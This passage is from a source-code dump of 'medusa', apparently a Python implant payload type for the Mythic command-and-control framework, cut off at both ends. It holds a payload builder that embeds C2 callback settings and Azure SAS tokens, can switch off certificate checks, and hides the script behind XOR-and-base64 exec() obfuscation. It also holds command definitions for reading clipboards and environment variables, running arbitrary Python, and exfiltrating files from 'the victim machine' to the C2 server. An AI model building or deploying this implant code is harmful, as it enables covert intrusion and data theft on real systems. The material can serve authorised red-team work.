parameter_type=BuildParameterType.ChooseOne,\n            description=\"Verify HTTPS certificate (if HTTP, leave yes)\",\n            choices=[\"Yes\", \"No\"],\n            default_value=\"Yes\"\n        )\n    ]\n\n\n    agent_path = pathlib.Path(\".\") / \"medusa\" / \"mythic\"\n    agent_icon_path = agent_path / \"medusa.svg\"\n    agent_code_path = pathlib.Path(\".\") / \"medusa\" / \"agent_code\"\n\n    build_steps = [\n        BuildStep(step_name=\"Gathering Files\", step_description=\"Creating script payload\"),\n        BuildStep(step_name=\"Obfuscating Script\", step_description=\"Encoding and encrypting script content\")\n    ]\n\n    translation_container = None\n\n    def getPythonVersionFile(self, directory, file):\n        pyv = self.get_parameter(\"python_version\")\n        filename = \"\"\n        if os.path.exists(os.path.join(directory, \"{}.py\".format(file))):\n            #while we've specified a python version, this function is agnostic so just return the .py\n            filename = os.path.join(directory, \"{}.py\".format(file))\n        elif pyv == \"Python 2.7\":\n            filename = os.path.join(directory, \"{}.py2\".format(file))\n        elif pyv == \"Python 3.8\":\n            filename = os.path.join(directory, \"{}.py3\".format(file))\n\n        if not os.path.exists(filename) or not filename:\n            return \"\"\n        else:\n            return filename\n\n    def _read_file(self, path: str) -> str:\n        with open(path, \"r\") as f:\n            return f.read()\n\n    def _apply_https_setting(self, base_code: str, profile_name: str) -> str:\n        if self.get_parameter(\"https_check\") != \"No\":\n            return base_code.replace(\"#CERTSKIP\", \"\")\n\n        if profile_name == \"azure_blob\":\n            return base_code.replace(\n                \"#CERTSKIP\",\n                \"\"\"\n    gcontext = ssl.create_default_context()\n    gcontext.check_hostname = False\n    gcontext.verify_mode = 
ssl.CERT_NONE\\n\"\"\"\n            )\n\n        return base_code.replace(\"urlopen(req)\", \"urlopen(req, context=gcontext)\").replace(\n            \"#CERTSKIP\",\n            \"\"\"\n        gcontext = ssl.create_default_context()\n        gcontext.check_hostname = False\n        gcontext.verify_mode = ssl.CERT_NONE\\n\"\"\"\n        )\n\n    def _parse_transport_template(self, template_code: str) -> dict:\n        parts = re.split(r\"###\\s*(IMPORTS|CLASS_FIELDS|FUNCTIONS|CONFIG)\\s*###\", template_code)\n        sections = {\"IMPORTS\": \"\", \"CLASS_FIELDS\": \"\", \"FUNCTIONS\": \"\", \"CONFIG\": \"\"}\n        for i in range(1, len(parts), 2):\n            section_name = parts[i].strip()\n            section_value = parts[i + 1]\n            sections[section_name] = section_value.strip(\"\\n\")\n        return sections\n\n    def _validate_transport_template_format(self, profile_name: str, template_code: str):\n        required = [\"IMPORTS\", \"CLASS_FIELDS\", \"FUNCTIONS\", \"CONFIG\"]\n        markers = re.findall(r\"###\\s*(IMPORTS|CLASS_FIELDS|FUNCTIONS|CONFIG)\\s*###\", template_code)\n        missing = [m for m in required if markers.count(m) == 0]\n        duplicates = [m for m in required if markers.count(m) > 1]\n        if missing or duplicates:\n            details = []\n            if missing:\n                details.append(\"missing markers: {}\".format(\", \".join(missing)))\n            if duplicates:\n                details.append(\"duplicate markers: {}\".format(\", \".join(duplicates)))\n            raise ValueError(\n                \"Transport template transport_{} has invalid section markers ({})\".format(\n                    profile_name,\n                    \"; \".join(details)\n                )\n            )\n\n    def _validate_transport_sections(self, profile_name: str, sections: dict):\n        required_non_empty = [\"FUNCTIONS\", \"CONFIG\"]\n        missing = [s for s in required_non_empty if not sections.get(s, 
\"\").strip()]\n        if missing:\n            raise ValueError(\n                \"Transport template transport_{} is missing required non-empty sections: {}\".format(\n                    profile_name,\n                    \", \".join(missing)\n                )\n            )\n\n    def _validate_core_markers_replaced(self, base_code: str, profile_name: str):\n        unresolved = [\n            marker for marker in [\n                \"TRANSPORT_IMPORTS\",\n                \"TRANSPORT_CLASS_FIELDS\",\n                \"TRANSPORT_FUNCTIONS\",\n                \"TRANSPORT_CONFIG\",\n            ]\n            if marker in base_code\n        ]\n        if unresolved:\n            raise ValueError(\n                \"Core template marker replacement failed for transport_{}; unresolved markers: {}\".format(\n                    profile_name,\n                    \", \".join(unresolved)\n                )\n            )\n\n    def _get_base_code_for_profile(self, profile_name: str) -> str:\n        base_path = self.getPythonVersionFile(os.path.join(self.agent_code_path, \"base_agent\"), \"base_agent_core\")\n        transport_path = self.getPythonVersionFile(os.path.join(self.agent_code_path, \"base_agent\"), f\"transport_{profile_name}\")\n        if not base_path:\n            raise ValueError(\"Missing base_agent_core template for selected python version\")\n        if not transport_path:\n            raise ValueError(\"Missing transport template for profile {} and selected python version\".format(profile_name))\n\n        base_code = self._read_file(base_path)\n        transport_template = self._read_file(transport_path)\n        self._validate_transport_template_format(profile_name, transport_template)\n        transport_sections = self._parse_transport_template(transport_template)\n        self._validate_transport_sections(profile_name, transport_sections)\n\n        base_code = base_code.replace(\"TRANSPORT_IMPORTS\", transport_sections[\"IMPORTS\"])\n       
 base_code = base_code.replace(\"TRANSPORT_CLASS_FIELDS\", transport_sections[\"CLASS_FIELDS\"])\n        base_code = base_code.replace(\"TRANSPORT_FUNCTIONS\", transport_sections[\"FUNCTIONS\"])\n        base_code = base_code.replace(\"TRANSPORT_CONFIG\", transport_sections[\"CONFIG\"])\n        self._validate_core_markers_replaced(base_code, profile_name)\n        return base_code\n\n    def _to_python_literal(self, value):\n        if isinstance(value, str):\n            return value\n        return json.dumps(value).replace(\"false\", \"False\").replace(\"true\", \"True\").replace(\"null\", \"None\")\n\n    def _apply_c2_parameter_replacements(self, base_code: str, c2):\n        params = c2.get_parameters_dict()\n        replacements = {\n            \"callback_host\": params.get(\"callback_host\", \"\"),\n            \"callback_port\": params.get(\"callback_port\", \"\"),\n            \"post_uri\": params.get(\"post_uri\", \"\"),\n            \"get_uri\": params.get(\"get_uri\", \"\"),\n            \"query_path_name\": params.get(\"query_path_name\", \"\"),\n            \"proxy_host\": params.get(\"proxy_host\", \"\"),\n            \"proxy_user\": params.get(\"proxy_user\", \"\"),\n            \"proxy_pass\": params.get(\"proxy_pass\", \"\"),\n            \"proxy_port\": params.get(\"proxy_port\", \"\"),\n            \"callback_interval\": params.get(\"callback_interval\", \"\"),\n            \"callback_jitter\": params.get(\"callback_jitter\", \"\"),\n            \"killdate\": params.get(\"killdate\", \"\"),\n            \"AESPSK\": params.get(\"AESPSK\", {}),\n            \"encrypted_exchange_check\": params.get(\"encrypted_exchange_check\", \"\"),\n            \"HEADER_PLACEHOLDER\": params.get(\"headers\", {}),\n        }\n\n        for placeholder, value in replacements.items():\n            if placeholder in base_code:\n                base_code = base_code.replace(placeholder, self._to_python_literal(value))\n        return base_code\n\n    async def 
build(self) -> BuildResponse:\n        # this function gets called to create an instance of your payload\n        resp = BuildResponse(status=BuildStatus.Success)\n        # create the payload\n        build_msg = \"\"\n        try:\n            command_code = \"\"\n            for cmd in self.commands.get_commands():\n                command_path = self.getPythonVersionFile(self.agent_code_path, cmd)\n                if not command_path:\n                    build_msg += \"{} command not available for {}.\\n\".format(cmd, self.get_parameter(\"python_version\"))\n                else:\n                    command_code += self._read_file(command_path) + \"\\n\"\n\n            selected_c2 = None\n            for c2 in self.c2info:\n                profile_name = c2.get_c2profile()[\"name\"]\n                if profile_name in [\"http\", \"azure_blob\"]:\n                    selected_c2 = c2\n                    break\n\n            if selected_c2 is None:\n                build_msg += \"No supported C2 profile selected for {}.\\n\".format(self.name)\n                resp.set_status(BuildStatus.Error)\n                resp.build_stderr = \"Error building payload: \" + build_msg\n                return resp\n\n            profile_name = selected_c2.get_c2profile()[\"name\"]\n            base_code = self._get_base_code_for_profile(profile_name)\n\n            if profile_name == \"azure_blob\":\n                params = selected_c2.get_parameters_dict()\n                killdate = params.get(\"killdate\", None)\n                callback_interval = str(params.get(\"callback_interval\", \"30\"))\n                callback_jitter = str(params.get(\"callback_jitter\", \"10\"))\n\n                config_data = await SendMythicRPCOtherServiceRPC(MythicRPCOtherServiceRPCMessage(\n                    ServiceName=\"azure_blob\",\n                    ServiceRPCFunction=\"generate_config\",\n                    ServiceRPCFunctionArguments={\n                        \"killdate\": 
killdate,\n                        \"payload_uuid\": self.uuid\n                    }\n                ))\n                if not config_data.Success:\n                    resp.status = BuildStatus.Error\n                    resp.build_stderr = f\"Build failed: {config_data.Error}\"\n                    return resp\n\n                await SendMythicRPCPayloadUpdatebuildStep(\n                    MythicRPCPayloadUpdateBuildStepMessage(\n                        PayloadUUID=self.uuid,\n                        StepName=\"Provisioning Azure Container\",\n                        StepStdout=f\"Container provisioned with scoped SAS token\\nEndpoint: {config_data.Result['blob_endpoint']}\",\n                        StepSuccess=True\n                    )\n                )\n                await SendMythicRPCPayloadUpdatebuildStep(\n                    MythicRPCPayloadUpdateBuildStepMessage(\n                        PayloadUUID=self.uuid,\n                        StepName=\"Stamping Configuration\",\n                        StepStdout=\"Embedding Azure configuration into agent\",\n                        StepSuccess=True\n                    )\n                )\n\n                base_code = base_code.replace(\"BLOB_ENDPOINT_PLACEHOLDER\", config_data.Result[\"blob_endpoint\"])\n                base_code = base_code.replace(\"CONTAINER_NAME_PLACEHOLDER\", config_data.Result[\"container_name\"])\n                base_code = base_code.replace(\"CONTAINER_SAS_PLACEHOLDER\", config_data.Result[\"sas_token\"])\n                base_code = base_code.replace(\"CALLBACK_INTERVAL_PLACEHOLDER\", callback_interval)\n                base_code = base_code.replace(\"CALLBACK_JITTER_PLACEHOLDER\", callback_jitter)\n                base_code = base_code.replace(\"AGENT_UUID_PLACEHOLDER\", self.uuid)\n\n            base_code = self._apply_https_setting(base_code, profile_name)\n\n\n            if self.get_parameter(\"use_non_default_cryptography_lib\") == \"Yes\":\n                
crypto_code = self._read_file(self.getPythonVersionFile(os.path.join(self.agent_code_path, \"base_agent\"), \"crypto_lib\"))\n            else:\n                crypto_code = self._read_file(self.getPythonVersionFile(os.path.join(self.agent_code_path, \"base_agent\"), \"manual_crypto\"))\n\n            base_code = base_code.replace(\"CRYPTO_HERE\", crypto_code)\n            base_code = base_code.replace(\"UUID_HERE\", self.uuid)\n            base_code = base_code.replace(\"#COMMANDS_HERE\", command_code)\n\n            base_code = self._apply_c2_parameter_replacements(base_code, selected_c2)\n\n            if build_msg != \"\":\n                resp.build_stderr = build_msg\n                resp.set_status(BuildStatus.Error)\n\n            await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage(\n                PayloadUUID=self.uuid,\n                StepName=\"Gathering Files\",\n                StepStdout=\"Found all files for payload\",\n                StepSuccess=True\n            ))\n\n            if self.get_parameter(\"obfuscate_script\") == \"Yes\":\n                key = hashlib.md5(os.urandom(128)).hexdigest().encode()\n                encrypted_content = ''.join(chr(c^k) for c,k in zip(base_code.encode(), cycle(key))).encode()\n                b64_enc_content = base64.b64encode(encrypted_content)\n                xor_func = \"chr(c^k)\" if self.get_parameter(\"python_version\") == \"Python 3.8\" else \"chr(ord(c)^ord(k))\"\n                base_code = \"\"\"import base64, itertools\nexec(''.join({} for c,k in zip(base64.b64decode({}), itertools.cycle({}))).encode())\n\"\"\".format(xor_func, b64_enc_content, key)\n\n                await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage(\n                    PayloadUUID=self.uuid,\n                    StepName=\"Obfuscating Script\",\n                    StepStdout=\"Script successfully obfuscated.\",\n                    StepSuccess=True\n               
 ))\n            else:\n                await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage(\n                    PayloadUUID=self.uuid,\n                    StepName=\"Obfuscating Script\",\n                    StepStdout=\"Obfuscation not requested, skipping.\",\n                    StepSuccess=True\n                ))\n\n            if self.get_parameter(\"output\") == \"base64\":\n                resp.payload = base64.b64encode(base_code.encode())\n                resp.build_message = \"Successfully Built\"\n            else:\n                resp.payload = base_code.encode()\n                resp.build_message = \"Successfully built!\"\n        except Exception as e:\n            resp.set_status(BuildStatus.Error)\n            resp.build_stderr = \"Error building payload: \" + str(e)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/cat.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass CatArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"path\",\n                type=ParameterType.String,\n                description=\"Read and output the content of a file\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                self.add_arg(\"path\", self.command_line)\n        else:\n            raise ValueError(\"Missing arguments\")\n\nclass CdCommand(CommandBase):\n    cmd = \"cat\"\n    needs_admin = False\n    help_cmd = \"cat /path/to/file\"\n    description = \"Read and output the contents of a file\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = [ \"T1005\" ]\n    argument_class = CatArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n    \n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = task.args.get_arg(\"path\")\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/cd.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\nimport sys\n\n\nclass CdArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"path\",\n                type=ParameterType.String,\n                default_value=\".\",\n                description=\"Path of file or folder on the current system to cd to\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                self.args[\"path\"].value = self.command_line\n        else:\n            self.args[\"path\"].value = \".\"\n\n\nclass CdCommand(CommandBase):\n    cmd = \"cd\"\n    needs_admin = False\n    help_cmd = \"cd /path/to/file\"\n    description = \"Change working directory\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = CdArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = task.args.get_arg(\"path\")\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/clipboard.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\nclass GetClipboardArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass GetClipboardCommand(CommandBase):\n    cmd = \"clipboard\"\n    needs_admin = False\n    help_cmd = \"clipboard\"\n    description = \"This reads and outputs the contents of the clipboard using ObjC APIs\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    argument_class = GetClipboardArguments\n    attackmapping = [ \"T1115\" ]\n    attributes = CommandAttributes(\n        filter_by_build_parameter={\n            \"python_version\": \"Python 2.7\"\n        },\n        supported_python_versions=[\"Python 2.7\"],\n        supported_os=[SupportedOS.MacOS],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/cp.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\nclass CpArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"destination\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True,\n                    ui_position=2\n                )],\n                description=\"Location for copied file or folder\",\n            ),\n            CommandParameter(\n                name=\"source\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True,\n                    ui_position=1\n                )],\n                description=\"Path to file or folder for copying\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            pieces = self.command_line.split(\" \")\n            if len(pieces) == 2:\n                self.add_arg(\"source\", pieces[0])\n                self.add_arg(\"destination\", pieces[1])\n            else:\n                raise Exception(\"Wrong number of parameters, should be 2\")\n        else:\n            self.load_args_from_json_string(self.command_line)\n\nclass CpCommand(CommandBase):\n    cmd = \"cp\"\n    needs_admin = False\n    help_cmd = \"cp source destination\"\n    description = \"copy file or folder to destination\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = CpArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        
task.display_params = \"Copying \" + str(task.args.get_arg(\"source\")) + \" to \"\n        task.display_params += str(task.args.get_arg(\"destination\"))\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/cwd.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\nclass GetCwdArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass GetCwdCommand(CommandBase):\n    cmd = \"cwd\"\n    needs_admin = False\n    help_cmd = \"cwd\"\n    description = \"This gets the current working directory\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    argument_class = GetCwdArguments\n    attackmapping = []\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n    \n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/download.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\n\nclass DownloadArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"file\", \n                type=ParameterType.String, \n                description=\"File to download.\",\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True\n                )]\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) == 0:\n            raise Exception(\"Require a path to download.\\n\\tUsage: {}\".format(DownloadCommand.help_cmd))\n        filename = \"\"\n        if self.command_line[0] == '\"' and self.command_line[-1] == '\"':\n            self.command_line = self.command_line[1:-1]\n            filename = self.command_line\n        elif self.command_line[0] == \"'\" and self.command_line[-1] == \"'\":\n            self.command_line = self.command_line[1:-1]\n            filename = self.command_line\n        elif self.command_line[0] == \"{\":\n            temp_json = json.loads(self.command_line)\n            # if \"host\" in temp_json:\n            #     # this means we have tasking from the file browser rather than the popup UI\n            #     # the medusa agent doesn't currently have the ability to do _remote_ listings, so we ignore it\n            # filename = temp_json[\"path\"] + \"/\" + temp_json[\"file\"]\n            filename = temp_json[\"file\"]\n            # else:\n            #     raise Exception(\"Unsupported JSON\")\n        else:\n            filename = self.command_line\n\n        if filename != \"\":\n            self.args[0].value = filename\n        \n\nclass DownloadCommand(CommandBase):\n    cmd = \"download\"\n    needs_admin = False\n    help_cmd = \"download {path to remote file}\"\n    
description = \"Download a file from the victim machine to the Mythic server in chunks (no need for quotes in the path).\"\n    version = 1\n    supported_ui_features = [\"file_browser:download\"]\n    is_download_file = True\n    author = \"@ajpc500\"\n    parameters = []\n    attackmapping = [\"T1020\", \"T1030\", \"T1041\"]\n    argument_class = DownloadArguments\n    browser_script = BrowserScript(script_name=\"download\", author=\"@its_a_feature_\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n\n    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:\n        response = PTTaskCreateTaskingMessageResponse(\n            TaskID=taskData.Task.ID,\n            Success=True,\n        )\n        download_file = taskData.args.get_arg(\"file\")\n        response.DisplayParams = f\"{download_file}\"\n        return response\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/download_bulk.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\n\nclass DownloadBulkArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"path\",\n                type=ParameterType.Array,\n                default_value=[],\n                description=\"Paths of file(s) or director(ies) to download.\",\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True\n                )]\n            ),\n            CommandParameter(\n                name=\"mode\",\n                type=ParameterType.ChooseOne,\n                choices=[\"archive\", \"iterative\"],\n                default_value=\"archive\",\n                description=(\n                    \"Download mode: 'archive' bundles all files into a single in-memory zip archive, \"\n                    \"'iterative' sends each file individually.\"\n                ),\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )]\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) == 0:\n            raise Exception(\n                \"Require a path to download.\\n\\tUsage: {}\".format(DownloadBulkCommand.help_cmd)\n            )\n\n        if self.command_line[0] == \"{\":\n            temp_json = json.loads(self.command_line)\n            if \"path\" in temp_json:\n                path_val = temp_json[\"path\"]\n                if isinstance(path_val, str):\n                    temp_json[\"path\"] = [path_val]\n            self.load_args_from_dictionary(temp_json)\n        else:\n            raw = self.command_line\n            if (raw[0] == '\"' and raw[-1] == '\"') or (raw[0] == \"'\" and raw[-1] == \"'\"):\n                raw = raw[1:-1]\n            
self.add_arg(\"path\", [raw])\n\n\nclass DownloadBulkCommand(CommandBase):\n    cmd = \"download_bulk\"\n    needs_admin = False\n    help_cmd = 'download_bulk {\"path\": [\"/remote/path\", \"/remote/path2\"], \"mode\": \"archive\"}'\n    description = (\n        \"Bulk download file(s), director(ies), or a mix from the target machine. \"\n        \"Use 'archive' mode to bundle everything into a single in-memory zip, \"\n        \"or 'iterative' mode to transfer each file individually.\"\n    )\n    version = 1\n    is_download_file = True\n    author = \"@maclarel\"\n    parameters = []\n    attackmapping = [\"T1020\", \"T1030\", \"T1041\"]\n    argument_class = DownloadBulkArguments\n    browser_script = BrowserScript(script_name=\"download_bulk\", author=\"@maclarel\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux],\n    )\n\n    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:\n        response = PTTaskCreateTaskingMessageResponse(\n            TaskID=taskData.Task.ID,\n            Success=True,\n        )\n        paths = taskData.args.get_arg(\"path\")\n        mode = taskData.args.get_arg(\"mode\") or \"archive\"\n        display = \", \".join(paths) if isinstance(paths, list) else str(paths)\n        response.DisplayParams = f\"{display} (mode: {mode})\"\n        return response\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/env.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\nclass GetEnvArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass GetEnvCommand(CommandBase):\n    cmd = \"env\"\n    needs_admin = False\n    help_cmd = \"env\"\n    description = \"This gets all environment variables\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    argument_class = GetEnvArguments\n    attackmapping = []\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/eval_code.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json, re\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass EvalArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"command\",\n                type=ParameterType.String,\n                description=\"Command to evaluate in Python interpreter\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            self.add_arg(\"command\", self.command_line)\n        \n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\n\nclass EvalCommand(CommandBase):\n    cmd = \"eval_code\"\n    needs_admin = False\n    help_cmd = \"eval_code python-code\"\n    description = \"Evaluate python code in interpreter\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = EvalArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = task.args.get_arg(\"command\")\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/exit.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\n\nclass ExitArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass ExitCommand(CommandBase):\n    cmd = \"exit\"\n    needs_admin = False\n    help_cmd = \"exit\"\n    description = \"This exits the current agent process\"\n    version = 1\n    supported_ui_features = [\"callback_table:exit\"]\n    is_exit = True\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"\"\n    argument_class = ExitArguments\n    attackmapping = []\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/jobkill.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass JobKillArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"target_task_id\",\n                type=ParameterType.String,\n                description=\"Stop a long-running job\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                self.add_arg(\"target_task_id\", self.command_line)\n        else:\n            raise ValueError(\"Missing arguments\")\n\nclass JobKillCommand(CommandBase):\n    cmd = \"jobkill\"\n    needs_admin = False\n    help_cmd = \"jobkill {task_id}\"\n    description = \"Sends a stop signal to a long-running job\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = JobKillArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 